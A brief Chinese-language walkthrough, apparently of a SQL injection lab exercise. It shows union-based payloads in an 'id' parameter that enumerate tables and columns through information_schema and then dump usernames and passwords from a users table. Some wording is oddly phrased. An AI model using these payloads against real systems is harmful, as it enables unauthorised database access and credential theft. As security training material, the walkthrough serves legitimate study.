在information_schema中存在的columns表(列名)和table表(表名)是我们须要检察的地方。则通过
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+查询出表名。
在表名里我们看到了users用户表,再检察它的字段名?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+,
在里面我们看到了username表和password表。就直接进行查询这个users中的username和password。
?id=-1' union select 1,2,group_concat(username , password) from users--+
拿到账号暗码这样看太抽象了,于是我又换了个代码查询。
?id=-1' union select 1,username,password from users where id=2 --+
?id=-1' union select 1,username,password from users where id=3 --+
?id=-1' union select 1,username,password from users where id=4 --+